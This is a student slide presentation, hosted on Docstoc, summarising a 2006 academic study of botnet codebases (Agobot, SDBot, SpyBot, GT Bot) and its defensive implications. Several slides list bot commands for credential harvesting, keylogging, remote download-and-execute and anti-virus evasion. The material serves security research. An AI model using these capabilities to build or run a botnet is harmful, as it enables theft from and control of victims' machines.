Docstoc

An Inside Look at Botnets.ppt

Document Sample
An Inside Look at Botnets.ppt Powered By Docstoc
					        An Inside Look at
                 Botnets
           By Paul Barford and Vinod
                       Yegneswaran
In Series: Advances in Information Security, Springer, 2006


                Presented by Jared Bott
Outline
   Why Study Botnets?
   A Brief History of Botnets
   Bot Study
   Findings and Implications
   Analysis of Paper




                                 2
Why?
   Malicious software is a major problem
       Reactive methods predominately used today are
        ultimately insufficient
   Proactive methods are required
       Develop a foundational understanding of the
        mechanisms used by malicious software
       Develop an open repository of malware
        information


                                                        3
Outline
   Why Study Botnets?
   A Brief History of Botnets
   Bot Study
   Findings and Implications
   Analysis of Paper




                                 4
Botnets
   A botnet is a collection of compromised
    computers controlled by their attacker
   Botnets trace their roots from Eggdrop bot
       Created for network management by Jeff Fisher in
        1993




                                                       5
Rise of Botnets
   Motivation for malicious activity is shifting
       Primary motivation has changed from vandalism
        and demonstration of programming skills to for-
        profit activities
           Identity theft, extortion
           Backed by organized crime




                                                          6
Botnets Today
   Botnets can be extremely large, with reports
    of botnets of over 100,000 systems
       Average size appears to be dropping
   Total estimated number of systems used in
    botnets is in the millions




                                                   7
Outline
   Why Study Botnets?
   A Brief History of Botnets
   Bot Study
   Findings and Implications
   Analysis of Paper




                                 8
Bot Study
   Objectives
       Highlight the richness and diversity of bot
        codebases
       Identify commonalities between codebases
       Consider how knowledge of these botnet
        mechanisms can lead to development of more
        effective defense mechanisms




                                                      9
Bot Study
   Attributes of bots to analyze
       Architecture
       Botnet Control Mechanisms
       Host Control Mechanisms
       Propagation Mechanisms
       Target Exploits and Attack Mechanisms
       Malware Delivery Mechanisms
       Obfuscation Methods
       Deception Strategies
                                                10
Bot Study
   Four bot codebases
       Agobot 4.0 pre-release
       SDBot 05b
       SpyBot 1.4
       GT Bot with DCOM




                                 11
Agobot
   AKA Gaobot, Phatbot
   First referenced in October, 2002
   Most sophisticated of the four codebases
       Typically around 20,000 lines of C/C++
   Monolithic architecture
   Adheres to structured design and software
    engineering principles
       Modular, standard data structures, code documentation
   Exhibits creativity in design

                                                                12
Agobot
   Components
       IRC-based command and control mechanism
       Large collection of target exploits
       Ability to launch different kinds of DoS attacks
       Modules for shell encodings and limited
        polymorphism
       Mechanisms to frustrate disassembly by well
        known tools


                                                           13
Agobot
   Components
       Ability to harvest local host for sensitive
        information, such as Paypal passwords and AOL
        keys through traffic sniffing, key logging or
        searching registry entries
       Mechanisms to defend and fortify compromised
        systems
   Over 580 variants


                                                        14
SDBot
   First referenced in October, 2002
   Hundreds of variants
   Fairly simple compared to Agobot
       Slightly over 2,000 lines of C
   Main source tree does not contain any overtly
    malicious code modules
   Published under GPL
   Primarily provides a utilitarian IRC-based
    command and control system
                                                15
SDBot
   Easy to extend
   Large number of patches that provide more
    sophisticated malicious capabilities and diffuse
    responsibility
       Scanning
       DoS attacks
       Sniffers
       Information harvesting
       Encryption routines
   Over 80 patches
                                                       16
SpyBot
   First referenced in April, 2003
   Hundreds of variants
   Fairly compact, around 3,000 lines of C
   Shares much of SDBot’s command and
    control engine
   No explicit attempt to diffuse accountability



                                                    17
SpyBot
   Capabilities
       NetBIOS, Kuang, Netdevil and KaZaa exploits
       Scanning capabilities
       Modules for launching flooding attacks
   Efficient
   Does not exhibit modularity or breadth of
    capabilities of Agobot


                                                      18
GT Bot
   AKA Global Threat Bot, Aristotles
   First referenced in April, 1998
   Over 100 variants
   Simple design
   Limited set of functions based on the
    scripting capabilities of mIRC
   Includes HideWindow program to keep the
    bot hidden
                                              19
GT Bot
   Includes BNC, a proxy system for anonymity
   Includes psexec.exe to facilitate remote
    process execution
   Nothing to suggest it was designed to be
    extensible
   Different versions for specific malicious
    intents
       With DCOM includes DCOM exploits

                                                 20
Bot Codebases
   Convergence in the set of functions that are
    available
       Suggests the possibility that defensive systems
        may eventually be effective across bot families
   Bot codebases are at least somewhat
    extensible




                                                          21
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            22
Botnet Control Mechanisms
   Command language and control protocols
    are used to operate botnets remotely after
    target systems have been compromised
   All analyzed bots base C&C on IRC
   Disruption of communication can render a
    botnet useless
       Network operators can sniff for specific
        commands in IRC traffic and identify
        compromised systems
                                                   23
Botnet Control Mechanisms
   Agobot
       C&C system derived from IRC
       Standard IRC is used to establish connections
       IRC and commands developed for Agobot are
        used for command language
   SDBot
       Command language is lightweight version of IRC
       Has IRC cloning and spying

                                                         24
Typical interaction between an SDBot and IRC server   25
Botnet Control Mechanisms
   SpyBot
       Command language is a subset of SDBot’s
        command language
   GT Bot
       Simplest command language of the bot families
       Large variations across different versions




                                                        26
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            27
Host Control Mechanisms
   The mechanisms used by the bot to
    manipulate a victim host once it has been
    compromised
       Fortify the local system against malicious attacks
       Disable anti-virus software
       Harvest sensitive information




                                                             28
Host Control Mechanisms
   Agobot
       Commands to secure system
       Broad set of commands to harvest sensitive
        information
       pctrl commands to list or kill processes running
        on host
       inst commands to add or delete autostart entries



                                                           29
Agobot Commands
Command               Description               Command         Description
harvest.cdkeys        Return a list of CD       pctrl.kill      Kill specified process
                      keys                                      set from service file
harvest.emails        Return a list of emails   pctrl.listsvc   Return list of all
harvest.emailshttp    Return a list of emails                   services that are
                      via HTTP                                  running

harvest.aol           Return a list of AOL      pctrl.killsvc   Delete/stop a
                      specific information                      specified service

harvest.registry      Return registry           pctrl.killpid   Kill specified process
                      information for           inst.asadd      Add an autostart
                      specific registry path                    entry
harvest.windowskeys   Return Windows            inst.asdel      Delete an autostart
                      registry information                      entry
pctrl.list            Return list of all        inst.svcadd     Adds a service to
                      processes                                 SCM
                                                inst.svcdel     Delete a service from
                                                                SCM                 30
Host Control Mechanisms
   SDBot
       Limited capabilities
       Basic remote execution commands
       Some ability to gather local information
       Auxiliary patches add more capabilities




                                                   31
SDBot Commands
Command                Description              Command                Description
download <url>         Downloaded               sysinfo                List host system
<dest> <action>        specified file and                              information
                       execute if action is                            (CPU/RAM/OS and
                       1                                               uptime)
killthread <thread#>   Kill specified thread    execute <visibility>   Run a specified
                                                <file> parameters      program (visibility is
update <url> <id>      If bot ID is different
                                                                       0/1)
                       than current,
                       download “sdbot          cdkey/getcdkey         Return keys of
                       executable” and                                 popular games e.g.,
                       update                                          Halflife, Soldier of
                                                                       Fortune etc.




                                                                                           32
Host Control Mechanisms
   SpyBot
       Similar capabilities to Agobot
       Local file manipulation
       Key logging
       Process/system manipulation, remote command
        execution




                                                      33
SpyBot Commands
Command              Description                    Command                 Description
delete <filename>    Delete a specified file        listprocesses           Return a list of all running
                                                                            processes
execute <filename>   Execute a specified file
                                                    killprocess             Kills the specified process
rename <origfile>    Rename a specified file        <processname>
<newfile>
                                                    threads                 Returns a list of all running
makedir <dirname>    Create a specified                                     threads
                     directory
                                                    killthread < number >   Kills a specified thread
startkeylogger       Starts the on-line
                                                    disconnect              Disconnect the bot for
                     keylogger                      <number>                number seconds
stopkeylogger        Stops the keylogger            reboot                  Reboot the system
sendkeys <keys>      Simulates key presses          cd-rom <0/1>            Open/close cd-rom
keyboardlights       Flashes remote keyboard        opencmd                 Starts cmd.exe (hidden)
                     lights 50x
                                                    cmd <command>           Sends a command to
passwords            Lists the RAS passwords                                cmd.exe
                     in Windows 9x systems          get <filename>          Triggers DCC send on bot
listprocesses        Return a list of all running   update <url>            Updates local copy of the
                     processes                                              bot code                        34
Host Control Mechanisms
   GT Bot
       Most limited capabilities
       Base capabilities are only gathering local system
        information and running or deleting local files
       Many versions with more capabilities




                                                            35
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            36
Propagation Mechanisms
   The mechanisms bots use to search for new
    host systems
       Traditionally horizontal or vertical scans
           Horizontal is one port across an address range
           Vertical is across a port range on an address




                                                             37
Propagation Mechanisms
   Agobot
       Relatively simple, essentially vertical and
        horizontal scanning
   SDBot
       No scanning or propagation in base distribution
       Variants with horizontal, vertical scanning and
        more complex methods



                                                          38
Propagation Mechanisms
   SpyBot
       Simple horizontal and vertical scanning
   GT Bot
       Simple horizontal and vertical scanning
   Due to simplicity and uniformity of methods, it
    may be possible to develop statistical finger
    printing methods to identify scans from
    botnets

                                                  39
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            40
Exploits and Attack
Mechanisms
   Specific methods for           Agobot exploits
    attacking known                    Bagle scanner
    vulnerabilities on target          DCOM scanners
    systems                            MyDoom scanner
   Agobot                             Dameware scanner
       Includes an ever               NetBIOS scanner
        broadening set of              Radmin scanner
        exploits                       MS-SQL scanner
                                       Generic DDoS module


                                                              41
Exploits and Attack
Mechanisms
   SDBot
       No exploits in standard distribution
       Modules for sending UDP and ICMP packets
           DoS
       Numerous variants with exploits
       Numerous variants with DDoS attack modules




                                                     42
Exploits and Attack
Mechanisms
   SpyBot
       Exploits depend on version of SpyBot
           Wide range of exploits
       Evaluated version has attacks on open NetBIOS
        shares
       DDoS interface closely related to SDBot
           UDP, ICMP, and TCP SYN




                                                        43
Exploits and Attack Mechanisms
   GT Bot
       This variant has RPC-DCOM exploits and Simple
        ICMP floods
       Many variants with many exploits and DoS
        capabilities
   Bots will likely become more like Agobot,
    each version having many exploits



                                                        44
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            45
Malware Delivery Mechanism
   The mechanisms bots use to deliver exploits
   Packers and shell encoders used to compress and
    obfuscate code
   SDBot, SpyBot, and GT Bot deliver exploit and
    encoded malware in one script
   Agobot separates exploits and delivery
       Exploit vulnerability and open shell on remote host
       Encoded malware binary delivered by HTTP or FTP
       Enables encoder to be used across exploits, streamlining
        codebase and potentially diversifying the resulting bit
        streams
                                                                   46
Agobot Delivery             2. Open shell


       Target computer




                                            3. HTTP/FTP File Transfer of Bot
          1. Send exploit




                                             Attacker computer (Bot)

                                                                           47
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            48
Obfuscation Mechanisms
   The mechanisms that are used to hide the
    details of what is being transmitted through
    the network and what arrives for execution on
    end hosts
   Only Agobot supports any kind of
    polymorphism



                                                49
Points of Analysis
   Botnet Control Mechanisms
   Host Control Mechanisms
   Propagation Mechanisms
   Target Exploits and Attack Mechanisms
   Malware Delivery Mechanisms
   Obfuscation Methods
   Deception Strategies

                                            50
Deception Strategies
   The mechanisms used to evade detection once a
    bot is installed on a target host
       Rootkits
   Only Agobot has elaborate deception mechanisms
       Tests for debuggers
       Tests for VMware
       Killing anti-virus processes
       Altering DNS entries of anti-virus software companies to
        point to localhost


                                                                   51
Outline
   Why Study Botnets?
   A Brief History of Botnets
   Bot Study
   Findings and Implications
   Analysis of Paper




                                 52
Findings and Implications
   Finding: The overall architecture and
    implementation of botnets is complex and
    evolving toward the use of common software
    engineering techniques.
   Implication: The regularization of botnet
    architecture provides insight on potential
    extensibility and could help to facilitate
    systematic evaluation of botnet code.

                                                 53
Findings and Implications
   Finding: The predominant remote control
    mechanism is IRC and in general includes a
    rich set of commands.
   Implication: Monitoring botnet activity on IRC
    channels and disruption of specific channels
    on IRC servers should continue to be an
    effective defensive strategy for the time
    being.

                                                     54
Findings and Implications
   Finding: The host control mechanisms used
    for harvesting sensitive information from host
    systems are ingenious and enable data from
    passwords to mailing lists to credit card
    numbers to be gathered.
   Implication: This is one of the most serious
    results of the study and suggests design
    objectives for future operating systems and
    applications.

                                                 55
Findings and Implications
   Finding: There are a wide diversity of exploits
    for infecting target systems, including many
    of those used by worms that target well
    known Microsoft vulnerabilities.
   Implication: This is yet additional evidence
    that keeping OS patches up to date is
    essential and informs requirements for
    network intrusion detection and prevention
    systems.

                                                  56
Findings and Implications
   Finding: All botnets include DoS attack
    capability.
   Implication: The specific DoS mechanisms in
    botnets can inform designs for DoS defense.




                                                  57
Findings and Implications
   Finding: All botnets include a variety of
    mechanisms for avoiding detection once
    installed.
   Implication: Development of methods for
    detecting and disinfecting compromised
    systems will need to keep pace.



                                                58
Findings and Implications
   Finding: Shell encoding and packing
    mechanisms are common. Polymorphism is
    found only in Agobot.
   Implication: A major focus on methods for
    detecting polymorphism may not be needed
    yet, but encodings will continue to present a
    challenge for defensive systems.


                                                    59
Findings and Implications
   Finding: Currently there are only a limited set
    of propagation mechanisms available in
    botnets.
   Implication: The specific propagation
    methods used in these botnets can form the
    basis for modeling and simulating botnet
    propagation.


                                                  60
Outline
   Why Study Botnets?
   A Brief History of Botnets
   Bot Study
   Findings and Implications
   Analysis of Paper




                                 61
Strengths
   Detailed evaluation of code and capabilities
   Starting point for malware database
       Open database would greatly help defensive
        capabilities
       Finding commonalities among bots could help
        create some kind of broad defense




                                                      62
Weaknesses
   Dynamic profiling of bots needs to be done
   Too many variants of bots to evaluate each
    and every one
   Analysis of this kind calls for source code
    access, which may not be available




                                                  63
Improvements
   Dynamic profiling
   Analysis points for other kinds of malware




                                                 64

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:7
posted:9/20/2011
language:English
pages:64
yanyan yan yanyan yan
About